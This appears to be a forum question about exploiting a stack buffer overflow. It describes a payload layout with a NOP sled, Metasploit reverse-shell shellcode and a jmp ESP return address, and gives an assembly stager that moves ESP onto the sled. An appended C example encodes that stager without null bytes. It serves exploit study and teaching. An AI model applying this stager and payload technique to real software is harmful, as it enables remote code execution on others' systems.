
BufferOverflow : ESP and access violation

Çağlar Arlı


The context:

I have a small question regarding ESP and access violations. I just exploited a buffer overflow with little space after ESP, so I did this:

Part 1: NOP sled

Part 2: my shellcode, a shikata_ga_nai-encoded reverse_tcp payload generated by Metasploit

Part 3: some more NOPs to fill the space

Part 4: 4 bytes overwriting the EIP saved on the stack. This is the address of a jmp ESP instruction in a segment not protected by ASLR.

Part 5: [this is where ESP points at the moment of the crash] some NOPs

Part 6: the first stage of my exploit.

For the first stage, avoiding \x00 bytes, I did:

mov eax, esp      ; EAX = ESP, which points into part 5/6 after the jmp ESP
sub eax, 944      ; move EAX 944 bytes down, to part 1 (the NOP sled)
jmp eax           ; transfer execution to the sled

It worked fine: the stack is overwritten, EIP goes to the jmp ESP instruction, execution arrives in part 6 of the exploit, it jumps to EAX, which points to part 1 of the exploit, and then executes the NOPs to arrive at the shellcode.

Problem: I got an access violation inside the shikata_ga_nai decoder.

I solved it by adding a mov esp, eax to the first stage:

mov eax, esp      ; EAX = ESP, which points into part 5/6 after the jmp ESP
sub eax, 944      ; move EAX 944 bytes down, to part 1 (the NOP sled)
mov esp, eax      ; move the stack pointer down to the sled as well
jmp esp           ; transfer execution to the sled

And it worked like a charm. So that would mean one cannot play with memory at lower addresses than ESP.

The question:

Does ESP really have anything to do with read/write permissions inside (outside, actually) the stack? The memory there was allocated, so I used it. Does EBP or any other register have anything to do with access violations?
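Added example, not part of the question above and not the poster's code: a small C program that assembles the four-instruction stager from the post (mov eax, esp / sub eax, imm / mov esp, eax / jmp esp) into raw x86 bytes and then steps those bytes through a two-register model to confirm where the final jmp esp lands. One point worth checking on the post's stager: a single `sub eax, imm32` is opcode 2D followed by the little-endian immediate, so 944 (0x000003B0) encodes as `2D B0 03 00 00`, which contains two \x00 bytes. The example therefore splits the offset into two immediates that are both free of zero bytes and sum to the offset modulo 2^32. The addresses (sled at 0x0012F000, ESP 944 bytes above it) are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Added example: build the "relocate ESP to the NOP sled" stager as bytes,
 * keep it free of \x00, and verify it in a register model. The layout
 * constants in main() are constructed, not taken from a real target.
 */

/* Offset the stager must subtract from ESP to land on the NOP sled (part 1). */
uint32_t stager_offset(uint32_t esp_at_crash, uint32_t sled_addr)
{
    return esp_at_crash - sled_addr;
}

static int null_free32(uint32_t v)
{
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xFFu) == 0) return 0;
    return 1;
}

int has_null_byte(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0) return 1;
    return 0;
}

/* sub eax, imm32 : opcode 2D + little-endian immediate (5 bytes). */
size_t encode_sub_eax_imm32(uint32_t imm, uint8_t *out)
{
    out[0] = 0x2D;
    for (int i = 0; i < 4; i++) out[1 + i] = (uint8_t)(imm >> (8 * i));
    return 5;
}

/* Return 1 if the single-instruction form "sub eax, imm" contains a \x00. */
int single_sub_has_null(uint32_t imm)
{
    uint8_t code[5];
    return has_null_byte(code, encode_sub_eax_imm32(imm, code));
}

/* Split target into a + b (mod 2^32) with both halves free of zero bytes. */
int split_null_free(uint32_t target, uint32_t *a, uint32_t *b)
{
    for (uint32_t k = 1; k <= 15; k++) {
        uint32_t x = 0x11111111u * k, y = target - x;
        if (null_free32(x) && null_free32(y)) { *a = x; *b = y; return 1; }
    }
    return 0;
}

/* mov eax,esp ; sub eax,a ; sub eax,b ; mov esp,eax ; jmp esp  (16 bytes) */
size_t encode_stager(uint32_t offset, uint8_t *out)
{
    uint32_t a, b;
    if (!split_null_free(offset, &a, &b)) return 0;
    size_t n = 0;
    out[n++] = 0x89; out[n++] = 0xE0;          /* mov eax, esp */
    n += encode_sub_eax_imm32(a, out + n);     /* sub eax, a   */
    n += encode_sub_eax_imm32(b, out + n);     /* sub eax, b   */
    out[n++] = 0x89; out[n++] = 0xC4;          /* mov esp, eax */
    out[n++] = 0xFF; out[n++] = 0xE4;          /* jmp esp      */
    return n;
}

/* Step the stager through a model of EAX/ESP. Returns the address the final
 * jmp esp transfers to (0 on a malformed stager); *esp receives the new ESP. */
uint32_t run_stager(const uint8_t *code, size_t len, uint32_t *esp)
{
    uint32_t eax = 0;
    for (size_t ip = 0; ip + 1 < len; ) {
        if (code[ip] == 0x89 && code[ip + 1] == 0xE0) { eax = *esp; ip += 2; }
        else if (code[ip] == 0x89 && code[ip + 1] == 0xC4) { *esp = eax; ip += 2; }
        else if (code[ip] == 0xFF && code[ip + 1] == 0xE4) return *esp;
        else if (code[ip] == 0x2D && ip + 5 <= len) {
            uint32_t imm = 0;
            for (int i = 0; i < 4; i++) imm |= (uint32_t)code[ip + 1 + i] << (8 * i);
            eax -= imm; ip += 5;
        }
        else return 0;
    }
    return 0;
}

/* 1 if a null-free stager for `offset` moves both EIP and ESP onto the sled. */
int stager_lands_on_sled(uint32_t sled, uint32_t offset)
{
    uint8_t code[16];
    uint32_t esp = sled + offset;
    size_t n = encode_stager(offset, code);
    if (n != 16 || has_null_byte(code, n)) return 0;
    return run_stager(code, n, &esp) == sled && esp == sled;
}

int main(void)
{
    uint32_t sled = 0x0012F000u, esp = sled + 944;   /* constructed layout */
    uint8_t code[16];
    size_t n = encode_stager(stager_offset(esp, sled), code);
    printf("single 'sub eax, 944' has \\x00: %d\n", single_sub_has_null(944));
    printf("two-sub stager (%zu bytes) has \\x00: %d\n", n, has_null_byte(code, n));
    printf("jmp esp lands at %#x, esp now %#x (sled at %#x)\n",
           run_stager(code, n, &esp), esp, sled);
    return 0;
}
```

The model only checks the encoding and the arithmetic; it says nothing about whether the memory at the destination is mapped or writable, which on a flat-memory OS such as Windows is decided by the page protections of each page, not by the value of ESP or any other register. What the stack pointer does decide is where the decoder stub's own stack traffic goes: the shikata_ga_nai stub finds its address with fnstenv [esp-0xc] followed by a pop, and the decode loop pushes and pops as well, so when it runs, ESP has to point into mapped, writable memory with room on both sides of it.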